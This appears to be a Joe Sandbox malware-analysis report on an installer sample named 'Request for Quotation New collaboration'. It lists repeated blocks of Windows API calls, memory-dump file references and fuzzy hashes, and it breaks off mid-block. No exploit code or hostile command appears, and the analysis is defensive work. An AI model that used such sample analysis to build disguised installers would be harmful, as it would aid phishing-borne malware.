                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1941528284-0
                                                                                                                                  • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                  • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                  • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                  • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                  • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                  • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                  • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                  • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                  • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                  • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                  • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401D44
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                                  • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  • Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                                  • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                                  • Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                                  • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                  • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                  • String ID: x>A
                                                                                                                                  • API String ID: 539440098-3854404225
                                                                                                                                  • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                                  • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                  • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                                  • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                  • wsprintfW.USER32 ref: 00404A12
                                                                                                                                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                  • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                                  • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                  • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                                  • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                  • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                  • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                  • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                  • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1356686001-0
                                                                                                                                  • Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                                  • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                  • Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                                  • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,76F92EE0,00405792,?,00436800,76F92EE0,00434000), ref: 004059EE
                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3751793516-0
                                                                                                                                  • Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                                  • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                  • Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                                  • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                                                                  APIs
                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1404258612-0
                                                                                                                                  • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                  • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                  • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                  • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                    • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                    • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3585118688-0
                                                                                                                                  • Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                                  • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                                  • Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                                  • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                    • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                  • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                                  • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                  • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: nsa
                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                  • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                  • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                                  • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                  • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405678
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
